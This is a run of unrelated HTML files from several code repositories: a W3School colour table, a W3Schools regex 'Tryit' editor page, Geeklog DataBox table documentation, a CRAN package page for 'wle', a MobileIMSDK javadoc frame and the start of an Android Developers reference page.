<td style='color:#ADFF2F'>173,255,47</td>
</tr>
<tr>
<td style='color:#F0FFF0'>HoneyDew</td>
<td style='color:#F0FFF0'>F0FFF0</td>
<td style='color:#F0FFF0'>240,255,240</td>
</tr>
<tr>
<td style='color:#FF69B4'>HotPink</td>
<td style='color:#FF69B4'>FF69B4</td>
<td style='color:#FF69B4'>255,105,180</td>
</tr>
<tr>
<td style='color:#CD5C5C'>IndianRed </td>
<td style='color:#CD5C5C'>CD5C5C</td>
<td style='color:#CD5C5C'>205,92,92</td>
</tr>
<tr>
<td style='color:#4B0082'>Indigo </td>
<td style='color:#4B0082'>4B0082</td>
<td style='color:#4B0082'>75,0,130</td>
</tr>
<tr>
<td style='color:#FFFFF0'>Ivory</td>
<td style='color:#FFFFF0'>FFFFF0</td>
<td style='color:#FFFFF0'>255,255,240</td>
</tr>
<tr>
<td style='color:#F0E68C'>Khaki</td>
<td style='color:#F0E68C'>F0E68C</td>
<td style='color:#F0E68C'>240,230,140</td>
</tr>
<tr>
<td style='color:#E6E6FA'>Lavender</td>
<td style='color:#E6E6FA'>E6E6FA</td>
<td style='color:#E6E6FA'>230,230,250</td>
</tr>
<tr>
<td style='color:#FFF0F5'>LavenderBlush</td>
<td style='color:#FFF0F5'>FFF0F5</td>
<td style='color:#FFF0F5'>255,240,245</td>
</tr>
<tr>
<td style='color:#7CFC00'>LawnGreen</td>
<td style='color:#7CFC00'>7CFC00</td>
<td style='color:#7CFC00'>124,252,0</td>
</tr>
<tr>
<td style='color:#FFFACD'>LemonChiffon</td>
<td style='color:#FFFACD'>FFFACD</td>
<td style='color:#FFFACD'>255,250,205</td>
</tr>
<tr>
<td style='color:#ADD8E6'>LightBlue</td>
<td style='color:#ADD8E6'>ADD8E6</td>
<td style='color:#ADD8E6'>173,216,230</td>
</tr>
<tr>
<td style='color:#F08080'>LightCoral</td>
<td style='color:#F08080'>F08080</td>
<td style='color:#F08080'>240,128,128</td>
</tr>
<tr>
<td style='color:#E0FFFF'>LightCyan</td>
<td style='color:#E0FFFF'>E0FFFF</td>
<td style='color:#E0FFFF'>224,255,255</td>
</tr>
<tr>
<td style='color:#FAFAD2'>LightGoldenRodYellow</td>
<td style='color:#FAFAD2'>FAFAD2</td>
<td style='color:#FAFAD2'>250,250,210</td>
</tr>
<tr>
<td style='color:#D3D3D3'>LightGray</td>
<td style='color:#D3D3D3'>D3D3D3</td>
<td style='color:#D3D3D3'>211,211,211</td>
</tr>
<tr>
<td style='color:#90EE90'>LightGreen</td>
<td style='color:#90EE90'>90EE90</td>
<td style='color:#90EE90'>144,238,144</td>
</tr>
<tr>
<td style='color:#FFB6C1'>LightPink</td>
<td style='color:#FFB6C1'>FFB6C1</td>
<td style='color:#FFB6C1'>255,182,193</td>
</tr>
<tr>
<td style='color:#FFA07A'>LightSalmon</td>
<td style='color:#FFA07A'>FFA07A</td>
<td style='color:#FFA07A'>255,160,122</td>
</tr>
<tr>
<td style='color:#20B2AA'>LightSeaGreen</td>
<td style='color:#20B2AA'>20B2AA</td>
<td style='color:#20B2AA'>32,178,170</td>
</tr>
<tr>
<td style='color:#87CEFA'>LightSkyBlue</td>
<td style='color:#87CEFA'>87CEFA</td>
<td style='color:#87CEFA'>135,206,250</td>
</tr>
<tr>
<td style='color:#778899'>LightSlateGray</td>
<td style='color:#778899'>778899</td>
<td style='color:#778899'>119,136,153</td>
</tr>
<tr>
<td style='color:#B0C4DE'>LightSteelBlue</td>
<td style='color:#B0C4DE'>B0C4DE</td>
<td style='color:#B0C4DE'>176,196,222</td>
</tr>
<tr>
<td style='color:#FFFFE0'>LightYellow</td>
<td style='color:#FFFFE0'>FFFFE0</td>
<td style='color:#FFFFE0'>255,255,224</td>
</tr>
<tr>
<td style='color:#00FF00'>Lime</td>
<td style='color:#00FF00'>00FF00</td>
<td style='color:#00FF00'>0,255,0</td>
</tr>
<tr>
<td style='color:#32CD32'>LimeGreen</td>
<td style='color:#32CD32'>32CD32</td>
<td style='color:#32CD32'>50,205,50</td>
</tr>
<tr>
<td style='color:#FAF0E6'>Linen</td>
<td style='color:#FAF0E6'>FAF0E6</td>
<td style='color:#FAF0E6'>250,240,230</td>
</tr>
<tr>
<td style='color:#FF00FF'>Magenta</td>
<td style='color:#FF00FF'>FF00FF</td>
<td style='color:#FF00FF'>255,0,255</td>
</tr>
<tr>
<td style='color:#800000'>Maroon</td>
<td style='color:#800000'>800000</td>
<td style='color:#800000'>128,0,0</td>
</tr>
<tr>
<td style='color:#66CDAA'>MediumAquaMarine</td>
<td style='color:#66CDAA'>66CDAA</td>
<td style='color:#66CDAA'>102,205,170</td>
</tr>
<tr>
<td style='color:#0000CD'>MediumBlue</td>
<td style='color:#0000CD'>0000CD</td>
<td style='color:#0000CD'>0,0,205</td>
</tr>
<tr>
<td style='color:#BA55D3'>MediumOrchid</td>
<td style='color:#BA55D3'>BA55D3</td>
<td style='color:#BA55D3'>186,85,211</td>
</tr>
<tr>
<td style='color:#9370DB'>MediumPurple</td>
<td style='color:#9370DB'>9370DB</td>
<td style='color:#9370DB'>147,112,219</td>
</tr>
<tr>
<td style='color:#3CB371'>MediumSeaGreen</td>
<td style='color:#3CB371'>3CB371</td>
<td style='color:#3CB371'>60,179,113</td>
</tr>
<tr>
<td style='color:#7B68EE'>MediumSlateBlue</td>
<td style='color:#7B68EE'>7B68EE</td>
<td style='color:#7B68EE'>123,104,238</td>
</tr>
<tr>
<td style='color:#00FA9A'>MediumSpringGreen</td>
<td style='color:#00FA9A'>00FA9A</td>
<td style='color:#00FA9A'>0,250,154</td>
</tr>
<tr>
<td style='color:#48D1CC'>MediumTurquoise</td>
<td style='color:#48D1CC'>48D1CC</td>
<td style='color:#48D1CC'>72,209,204</td>
</tr>
<tr>
<td style='color:#C71585'>MediumVioletRed</td>
<td style='color:#C71585'>C71585</td>
<td style='color:#C71585'>199,21,133</td>
</tr>
<tr>
<td style='color:#191970'>MidnightBlue</td>
<td style='color:#191970'>191970</td>
<td style='color:#191970'>25,25,112</td>
</tr>
<tr>
<td style='color:#F5FFFA'>MintCream</td>
<td style='color:#F5FFFA'>F5FFFA</td>
<td style='color:#F5FFFA'>245,255,250</td>
</tr>
<tr>
<td style='color:#FFE4E1'>MistyRose</td>
<td style='color:#FFE4E1'>FFE4E1</td>
<td style='color:#FFE4E1'>255,228,225</td>
</tr>
<tr>
<td style='color:#FFE4B5'>Moccasin</td>
<td style='color:#FFE4B5'>FFE4B5</td>
<td style='color:#FFE4B5'>255,228,181</td>
</tr>
<tr>
<td style='color:#FFDEAD'>NavajoWhite</td>
<td style='color:#FFDEAD'>FFDEAD</td>
<td style='color:#FFDEAD'>255,222,173</td>
</tr>
<tr>
<td style='color:#000080'>Navy</td>
<td style='color:#000080'>000080</td>
<td style='color:#000080'>0,0,128</td>
</tr>
<tr>
<td style='color:#FDF5E6'>OldLace</td>
<td style='color:#FDF5E6'>FDF5E6</td>
<td style='color:#FDF5E6'>253,245,230</td>
</tr>
<tr>
<td style='color:#808000'>Olive</td>
<td style='color:#808000'>808000</td>
<td style='color:#808000'>128,128,0</td>
</tr>
<tr>
<td style='color:#6B8E23'>OliveDrab</td>
<td style='color:#6B8E23'>6B8E23</td>
<td style='color:#6B8E23'>107,142,35</td>
</tr>
<tr>
<td style='color:#FFA500'>Orange</td>
<td style='color:#FFA500'>FFA500</td>
<td style='color:#FFA500'>255,165,0</td>
</tr>
<tr>
<td style='color:#FF4500'>OrangeRed</td>
<td style='color:#FF4500'>FF4500</td>
<td style='color:#FF4500'>255,69,0</td>
</tr>
<tr>
<td style='color:#DA70D6'>Orchid</td>
<td style='color:#DA70D6'>DA70D6</td>
<td style='color:#DA70D6'>218,112,214</td>
</tr>
<tr>
<td style='color:#EEE8AA'>PaleGoldenRod</td>
<td style='color:#EEE8AA'>EEE8AA</td>
<td style='color:#EEE8AA'>238,232,170</td>
</tr>
<tr>
<td style='color:#98FB98'>PaleGreen</td>
<td style='color:#98FB98'>98FB98</td>
<td style='color:#98FB98'>152,251,152</td>
</tr>
<tr>
<td style='color:#AFEEEE'>PaleTurquoise</td>
<td style='color:#AFEEEE'>AFEEEE</td>
<td style='color:#AFEEEE'>175,238,238</td>
</tr>
<tr>
<td style='color:#DB7093'>PaleVioletRed</td>
<td style='color:#DB7093'>DB7093</td>
<td style='color:#DB7093'>219,112,147</td>
</tr>
<tr>
<td style='color:#FFEFD5'>PapayaWhip</td>
<td style='color:#FFEFD5'>FFEFD5</td>
<td style='color:#FFEFD5'>255,239,213</td>
</tr>
<tr>
<td style='color:#FFDAB9'>PeachPuff</td>
<td style='color:#FFDAB9'>FFDAB9</td>
<td style='color:#FFDAB9'>255,218,185</td>
</tr>
<tr>
<td style='color:#CD853F'>Peru</td>
<td style='color:#CD853F'>CD853F</td>
<td style='color:#CD853F'>205,133,63</td>
</tr>
<tr>
<td style='color:#FFC0CB'>Pink</td>
<td style='color:#FFC0CB'>FFC0CB</td>
<td style='color:#FFC0CB'>255,192,203</td>
</tr>
<tr>
<td style='color:#DDA0DD'>Plum</td>
<td style='color:#DDA0DD'>DDA0DD</td>
<td style='color:#DDA0DD'>221,160,221</td>
</tr>
<tr>
<td style='color:#B0E0E6'>PowderBlue</td>
<td style='color:#B0E0E6'>B0E0E6</td>
<td style='color:#B0E0E6'>176,224,230</td>
</tr>
<tr>
<td style='color:#800080'>Purple</td>
<td style='color:#800080'>800080</td>
<td style='color:#800080'>128,0,128</td>
</tr>
<tr>
<td style='color:#FF0000'>Red</td>
<td style='color:#FF0000'>FF0000</td>
<td style='color:#FF0000'>255,0,0</td>
</tr>
<tr>
<td style='color:#BC8F8F'>RosyBrown</td>
<td style='color:#BC8F8F'>BC8F8F</td>
<td style='color:#BC8F8F'>188,143,143</td>
</tr>
<tr>
<td style='color:#4169E1'>RoyalBlue</td>
<td style='color:#4169E1'>4169E1</td>
<td style='color:#4169E1'>65,105,225</td>
</tr>
<tr>
<td style='color:#8B4513'>SaddleBrown</td>
<td style='color:#8B4513'>8B4513</td>
<td style='color:#8B4513'>139,69,19</td>
</tr>
<tr>
<td style='color:#FA8072'>Salmon</td>
<td style='color:#FA8072'>FA8072</td>
<td style='color:#FA8072'>250,128,114</td>
</tr>
<tr>
<td style='color:#F4A460'>SandyBrown</td>
<td style='color:#F4A460'>F4A460</td>
<td style='color:#F4A460'>244,164,96</td>
</tr>
<tr>
<td style='color:#2E8B57'>SeaGreen</td>
<td style='color:#2E8B57'>2E8B57</td>
<td style='color:#2E8B57'>46,139,87</td>
</tr>
<tr>
<td style='color:#FFF5EE'>SeaShell</td>
<td style='color:#FFF5EE'>FFF5EE</td>
<td style='color:#FFF5EE'>255,245,238</td>
</tr>
<tr>
<td style='color:#A0522D'>Sienna</td>
<td style='color:#A0522D'>A0522D</td>
<td style='color:#A0522D'>160,82,45</td>
</tr>
<tr>
<td style='color:#C0C0C0'>Silver</td>
<td style='color:#C0C0C0'>C0C0C0</td>
<td style='color:#C0C0C0'>192,192,192</td>
</tr>
<tr>
<td style='color:#87CEEB'>SkyBlue</td>
<td style='color:#87CEEB'>87CEEB</td>
<td style='color:#87CEEB'>135,206,235</td>
</tr>
<tr>
<td style='color:#6A5ACD'>SlateBlue</td>
<td style='color:#6A5ACD'>6A5ACD</td>
<td style='color:#6A5ACD'>106,90,205</td>
</tr>
<tr>
<td style='color:#708090'>SlateGray</td>
<td style='color:#708090'>708090</td>
<td style='color:#708090'>112,128,144</td>
</tr>
<tr>
<td style='color:#FFFAFA'>Snow</td>
<td style='color:#FFFAFA'>FFFAFA</td>
<td style='color:#FFFAFA'>255,250,250</td>
</tr>
<tr>
<td style='color:#00FF7F'>SpringGreen</td>
<td style='color:#00FF7F'>00FF7F</td>
<td style='color:#00FF7F'>0,255,127</td>
</tr>
<tr>
<td style='color:#4682B4'>SteelBlue</td>
<td style='color:#4682B4'>4682B4</td>
<td style='color:#4682B4'>70,130,180</td>
</tr>
<tr>
<td style='color:#D2B48C'>Tan</td>
<td style='color:#D2B48C'>D2B48C</td>
<td style='color:#D2B48C'>210,180,140</td>
</tr>
<tr>
<td style='color:#008080'>Teal</td>
<td style='color:#008080'>008080</td>
<td style='color:#008080'>0,128,128</td>
</tr>
<tr>
<td style='color:#D8BFD8'>Thistle</td>
<td style='color:#D8BFD8'>D8BFD8</td>
<td style='color:#D8BFD8'>216,191,216</td>
</tr>
<tr>
<td style='color:#FF6347'>Tomato</td>
<td style='color:#FF6347'>FF6347</td>
<td style='color:#FF6347'>255,99,71</td>
</tr>
<tr>
<td style='color:#40E0D0'>Turquoise</td>
<td style='color:#40E0D0'>40E0D0</td>
<td style='color:#40E0D0'>64,224,208</td>
</tr>
<tr>
<td style='color:#EE82EE'>Violet</td>
<td style='color:#EE82EE'>EE82EE</td>
<td style='color:#EE82EE'>238,130,238</td>
</tr>
<tr>
<td style='color:#F5DEB3'>Wheat</td>
<td style='color:#F5DEB3'>F5DEB3</td>
<td style='color:#F5DEB3'>245,222,179</td>
</tr>
<tr>
<td style='color:#FFFFFF'>White</td>
<td style='color:#FFFFFF'>FFFFFF</td>
<td style='color:#FFFFFF'>255,255,255</td>
</tr>
<tr>
<td style='color:#F5F5F5'>WhiteSmoke</td>
<td style='color:#F5F5F5'>F5F5F5</td>
<td style='color:#F5F5F5'>245,245,245</td>
</tr>
<tr>
<td style='color:#FFFF00'>Yellow</td>
<td style='color:#FFFF00'>FFFF00</td>
<td style='color:#FFFF00'>255,255,0</td>
</tr>
<tr>
<td style='color:#9ACD32'>YellowGreen</td>
<td style='color:#9ACD32'>9ACD32</td>
<td style='color:#9ACD32'>154,205,50</td>
</tr>
</table>
</div>
<div id="footer">
<p><a href="../index-2.html" title="W3School 在线教程">w3school.com.cn</a></p>
</div>
</div>
</body>
<!-- Mirrored from www.w3school.com.cn/tiy/color.asp?color=Azure by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 01 Dec 2015 23:46:18 GMT -->
</html>
|
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryit2568.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_regexp_exec2 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:27:41 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAgent.match(/iPad/i) ) {
document.getElementById('viewport').setAttribute("content", "width=device-width, initial-scale=0.9");
}
}());
</script>
<link rel="stylesheet" href="../trycss.css">
<!--[if lt IE 8]>
<style>
.textareacontainer, .iframecontainer {width:48%;}
.textarea, .iframe {height:800px;}
#textareaCode, #iframeResult {height:700px;}
.menu img {display:none;}
</style>
<![endif]-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-3855518-1', 'auto');
ga('require', 'displayfeatures');
ga('send', 'pageview');
</script>
<script>
var googletag = googletag || {};
googletag.cmd = googletag.cmd || [];
(function() {
var gads = document.createElement('script');
gads.async = true;
gads.type = 'text/javascript';
var useSSL = 'https:' == document.location.protocol;
gads.src = (useSSL ? 'https:' : 'http:') +
'//www.googletagservices.com/tag/js/gpt.js';
var node = document.getElementsByTagName('script')[0];
node.parentNode.insertBefore(gads, node);
})();
</script>
<script>
googletag.cmd.push(function() {
googletag.defineSlot('/16833175/TryitLeaderboard', [[728, 90], [970, 90]], 'div-gpt-ad-1383036313516-0').addService(googletag.pubads());
googletag.pubads().setTargeting("content","tryjs");
googletag.pubads().enableSingleRequest();
googletag.enableServices();
});
</script>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("textareaCode").value;
t=t.replace(/=/gi,"w3equalsign");
var pos=t.search(/script/i)
while (pos>0)
{
t=t.substring(0,pos) + "w3" + t.substr(pos,3) + "w3" + t.substr(pos+3,3) + "tag" + t.substr(pos+6);
pos=t.search(/script/i);
}
if ( navigator.userAgent.match(/Safari/i) ) {
t=escape(t);
document.getElementById("bt").value="1";
}
document.getElementById("code").value=t;
document.getElementById("tryitform").action="tryit_view52a0.html?x=" + Math.random();
validateForm();
document.getElementById("iframeResult").contentWindow.name = "view";
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>8000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
<style>
</style>
</head>
<body>
<div id="ads">
<div style="position:relative;width:100%;margin-top:0px;margin-bottom:0px;">
<div style="width:974px;height:94px;position:relative;margin:0px;margin-top:5px;margin-bottom:5px;margin-right:auto;margin-left:auto;padding:0px;overflow:hidden;">
<!-- TryitLeaderboard -->
<div id='div-gpt-ad-1383036313516-0' style='width:970px; height:90px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1383036313516-0'); });
</script>
</div>
<div style="clear:both"></div>
</div>
</div>
</div>
<div class="container">
<div class="textareacontainer">
<div class="textarea">
<div class="headerText" style="width:auto;float:left;">Edit This Code:</div>
<div class="headerBtnDiv" style="width:auto;float:right;margin-top:8px;margin-right:2.4%;"><button class="submit" type="button" onclick="submitTryit()">See Result »</button></div>
<div class="textareawrapper">
<textarea autocomplete="off" class="code_input" id="textareaCode" wrap="logical" xrows="30" xcols="50"><!DOCTYPE html>
<html>
<body>
<p>The exec() method returns the matched text if it finds a match, otherwise it returns null.</p>
<p>Click the button to search a string for the character "e".</p>
<button onclick="myFunction()">Try it</button>
<p id="demo"></p>
<script>
function myFunction() {
var str = "The best things in life are free";
var patt = new RegExp("e");
var res = patt.exec(str);
document.getElementById("demo").innerHTML = res;
}
</script>
</body>
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_regexp_exec2 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:27:41 GMT -->
</html>
</textarea>
<form autocomplete="off" style="margin:0px;display:none;" action="http://www.w3schools.com/jsref/tryit_view.asp" method="post" target="view" id="tryitform" name="tryitform" onsubmit="validateForm();">
<input type="hidden" name="code" id="code" />
<input type="hidden" id="bt" name="bt" />
</form>
</div>
</div>
</div>
<div class="iframecontainer">
<div class="iframe">
<div class="headerText resultHeader">Result:</div>
<div class="iframewrapper">
<iframe id="iframeResult" class="result_output" frameborder="0" name="view" xsrc="tryjsref_regexp_exec2.html"></iframe>
</div>
<div class="footerText">Try it Yourself - © <a href="../index.html">w3schools.com</a></div>
</div>
</div>
</div>
<script>submitTryit()</script>
</body>
</html> |
extended/public_html/admin/plugins/databox/docs/japanese/table_def_fieldset.html | ivywe/geeklog-ivywe | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="ja">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Style-Type" content="text/css">
<title>DataBox | Geeklogドキュメント</title>
<link rel="stylesheet" type="text/css" href="../../../../../docs/docstyle.css" title="Dev Stylesheet">
<link rel="stylesheet" type="text/css" href="../../../../../docs/japanese/docstyle.css" title="Dev Stylesheet">
</head>
<!-- admin/plugins/databox/docs/japanese/table_def_fieldset.html 20140228-->
<body>
<p><a href="http://www.geeklog.jp" style="background:transparent"><img src="../../../../../docs/images/newlogo.gif" alt="Geeklog Documentation" width="243" height="90"></a></p>
<div class="menu">
<a href="../../../../../docs/japanese/index.html">Geeklogドキュメント</a>
- <a href="index.html">データボックス(DataBox) プラグイン</a>
- <a href="tables.html">テーブル一覧</a>
- DATABOX_def_fieldset タイプ定義</div>
<p>
<a href="../../../../../">トップページ</a>
<a href="../../../../../admin/plugins/databox/">管理画面</a>
</p>
<h1><a href="index.html">DataBox プラグイン</h1>
<h2><a href="tables.html">テーブル一覧</a></h2>
<h3><a name="data">DATABOX_def_fieldset タイプ定義</a>(2014/02/28 update 書きかけです)</h3>
<table>
<tr><th style="width:20%">名前</th>
<th style="width:15%">データ型</th>
<th style="width:15%">デフォルト</th>
<th style="width:50%">説明</th>
</tr>
<tbody>
<tr>
<td valign="top"><a name="desc_fieldset_id">fieldset_id</a></td>
<td valign="top">int(11)</td>
<td valign="top"> </td>
<td valign="top"> </td>
</tr>
<tr class="r2">
<td valign="top"><a name="desc_name">name</a></td>
<td valign="top">varchar(64)</td>
<td valign="top"> </td>
<td valign="top"> </td>
</tr>
<tr class="r2">
<td valign="top"><a name="desc_description">description</a></td>
<td valign="top">mediumtext</td>
<td valign="top"> </td>
<td valign="top"> </td>
</tr>
<tr class="r2">
<td valign="top"><a name="desc_defaulttemplatesdirectory">defaulttemplatedirectory</a></td>
<td valign="top">varchar(40)</td>
<td valign="top"> </td>
<td valign="top"> </td>
</tr>
<tr class="r2">
<td valign="top"><a name="desc_layout">layout</a></td>
<td valign="top">varchar(16)</td>
<td valign="top"> </td>
<td valign="top"> </td>
</tr>
<tr>
<td valign="top"><a name="desc_udatetime">udatetime</a></td>
<td valign="top">timestamp</td>
<td valign="top">CURRENT_TIMESTAMP </td>
<td valign="top"> </td>
</tr>
</tbody></table>
<h3>変更履歴</h3>
<ul>
<li>2012/09/11 追加</li>
</ul>
<div class="footer">
<a href="http://wiki.geeklog.net/">Geeklogドキュメント作成プロジェクト</a>、<a href="http://wiki.geeklog.jp/">Geeklogドキュメント日本語版作成プロジェクト</a><br />
本ページのすべての商標と著作権はそれぞれの所有者に帰属します。Geeklogはコピーレフトです。
</div>
</body>
</html>
|
Code/GetMetaDataFromCRAN/raw_html/wle.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package wle</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
table td { vertical-align: top; }
</style>
</head>
<body>
<h2>wle: Weighted Likelihood Estimation</h2>
<p>Approach to the robustness via Weighted Likelihood. </p>
<table summary="Package wle summary">
<tr>
<td>Version:</td>
<td>0.9-91</td>
</tr>
<tr>
<td>Depends:</td>
<td>R (≥ 3.0.0), <a href="../circular/index.html">circular</a></td>
</tr>
<tr>
<td>Published:</td>
<td>2015-10-18</td>
</tr>
<tr>
<td>Author:</td>
<td>Claudio Agostinelli, SLATEC Common Mathematical Library <www.netlib.org/slatec></td>
</tr>
<tr>
<td>Maintainer:</td>
<td>Claudio Agostinelli <claudio.agostinelli at unitn.it></td>
</tr>
<tr>
<td>License:</td>
<td><a href="../../licenses/GPL-2">GPL-2</a></td>
</tr>
<tr>
<td>Copyright:</td>
<td>see file <a href="COPYRIGHTS">COPYRIGHTS</a></td>
</tr>
<tr>
<td>NeedsCompilation:</td>
<td>yes</td>
</tr>
<tr>
<td>Materials:</td>
<td><a href="README">README</a> <a href="NEWS">NEWS</a> </td>
</tr>
<tr>
<td>In views:</td>
<td><a href="../../views/Cluster.html">Cluster</a>, <a href="../../views/Robust.html">Robust</a></td>
</tr>
<tr>
<td>CRAN checks:</td>
<td><a href="../../checks/check_results_wle.html">wle results</a></td>
</tr>
</table>
<h4>Downloads:</h4>
<table summary="Package wle downloads">
<tr>
<td> Reference manual: </td>
<td> <a href="wle.pdf"> wle.pdf </a> </td>
</tr>
<tr>
<td> Package source: </td>
<td> <a href="../../../src/contrib/wle_0.9-91.tar.gz"> wle_0.9-91.tar.gz </a> </td>
</tr>
<tr>
<td> Windows binaries: </td>
<td> r-devel: <a href="../../../bin/windows/contrib/3.5/wle_0.9-91.zip">wle_0.9-91.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/wle_0.9-91.zip">wle_0.9-91.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/wle_0.9-91.zip">wle_0.9-91.zip</a> </td>
</tr>
<tr>
<td> OS X El Capitan binaries: </td>
<td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/wle_0.9-91.tgz">wle_0.9-91.tgz</a> </td>
</tr>
<tr>
<td> OS X Mavericks binaries: </td>
<td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/wle_0.9-91.tgz">wle_0.9-91.tgz</a> </td>
</tr>
<tr>
<td> Old sources: </td>
<td> <a href="../../../src/contrib/Archive/wle"> wle archive </a> </td>
</tr>
</table>
<h4>Linking:</h4>
<p>Please use the canonical form
<a href="https://CRAN.R-project.org/package=wle"><samp>https://CRAN.R-project.org/package=wle</samp></a>
to link to this page.</p>
</body>
</html>
|
docs/api_docs/server-Mina版/net/openmob/mobileimsdk/server/qos/package-frame.html | suxinde2009/MobileIMSDK | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_18) on Wed Jan 03 16:33:03 CST 2018 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
net.openmob.mobileimsdk.server.qos (MobileIMSDK 3.2(Server端-Mina版) API文档)
</TITLE>
<META NAME="date" CONTENT="2018-01-03">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="white">
<FONT size="+1" CLASS="FrameTitleFont">
<A HREF="../../../../../net/openmob/mobileimsdk/server/qos/package-summary.html" target="classFrame">net.openmob.mobileimsdk.server.qos</A></FONT>
<TABLE BORDER="0" WIDTH="100%" SUMMARY="">
<TR>
<TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont">
类</FONT>
<FONT CLASS="FrameItemFont">
<BR>
<A HREF="QoS4ReciveDaemonC2S.html" title="net.openmob.mobileimsdk.server.qos 中的类" target="classFrame">QoS4ReciveDaemonC2S</A>
<BR>
<A HREF="QoS4ReciveDaemonRoot.html" title="net.openmob.mobileimsdk.server.qos 中的类" target="classFrame">QoS4ReciveDaemonRoot</A>
<BR>
<A HREF="QoS4SendDaemonRoot.html" title="net.openmob.mobileimsdk.server.qos 中的类" target="classFrame">QoS4SendDaemonRoot</A>
<BR>
<A HREF="QoS4SendDaemonS2C.html" title="net.openmob.mobileimsdk.server.qos 中的类" target="classFrame">QoS4SendDaemonS2C</A></FONT></TD>
</TR>
</TABLE>
</BODY>
</HTML>
|
21082014/source/xamarin/Components/googleplayservices-18.0.0.1/lib/android/18/content/google-play-services/docs/reference/com/google/android/gms/games/multiplayer/turnbased/TurnBasedMatchBuffer.html | apead/CTXUG | <!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width" />
<link rel="shortcut icon" type="image/x-icon" href="../../../../../../../../favicon.ico" />
<title>TurnBasedMatchBuffer | Android Developers</title>
<!-- STYLESHEETS -->
<link rel="stylesheet"
href="http://fonts.googleapis.com/css?family=Roboto+Condensed">
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Roboto:light,regular,medium,thin,italic,mediumitalic,bold"
title="roboto">
<link href="../../../../../../../../assets/css/default.css" rel="stylesheet" type="text/css">
<!-- FULLSCREEN STYLESHEET -->
<link href="../../../../../../../../assets/css/fullscreen.css" rel="stylesheet" class="fullscreen"
type="text/css">
<!-- JAVASCRIPT -->
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="../../../../../../../../assets/js/android_3p-bundle.js" type="text/javascript"></script>
<script type="text/javascript">
var toRoot = "../../../../../../../../";
var metaTags = [];
var devsite = false;
</script>
<script src="../../../../../../../../assets/js/docs.js" type="text/javascript"></script>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-5831155-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</head>
<body class="gc-documentation
develop" itemscope itemtype="http://schema.org/Article">
<div id="doc-api-level" class="" style="display:none"></div>
<a name="top"></a>
<a name="top"></a>
<!-- Header -->
<div id="header-wrapper">
<div id="header">
<div class="wrap" id="header-wrap">
<div class="col-3 logo">
<a href="../../../../../../../../index.html">
<img src="../../../../../../../../assets/images/dac_logo.png"
srcset="../../../../../../../../assets/images/dac_logo@2x.png 2x"
width="123" height="25" alt="Android Developers" />
</a>
<div class="btn-quicknav" id="btn-quicknav">
<a href="#" class="arrow-inactive">Quicknav</a>
<a href="#" class="arrow-active">Quicknav</a>
</div>
</div>
<ul class="nav-x col-9">
<li class="design">
<a href="../../../../../../../../design/index.html"
zh-tw-lang="設計"
zh-cn-lang="设计"
ru-lang="Проектирование"
ko-lang="디자인"
ja-lang="設計"
es-lang="Diseñar"
>Design</a></li>
<li class="develop"><a href="../../../../../../../../develop/index.html"
zh-tw-lang="開發"
zh-cn-lang="开发"
ru-lang="Разработка"
ko-lang="개발"
ja-lang="開発"
es-lang="Desarrollar"
>Develop</a></li>
<li class="distribute last"><a href="../../../../../../../../distribute/googleplay/index.html"
zh-tw-lang="發佈"
zh-cn-lang="分发"
ru-lang="Распространение"
ko-lang="배포"
ja-lang="配布"
es-lang="Distribuir"
>Distribute</a></li>
</ul>
<div class="menu-container">
<div class="moremenu">
<div id="more-btn"></div>
</div>
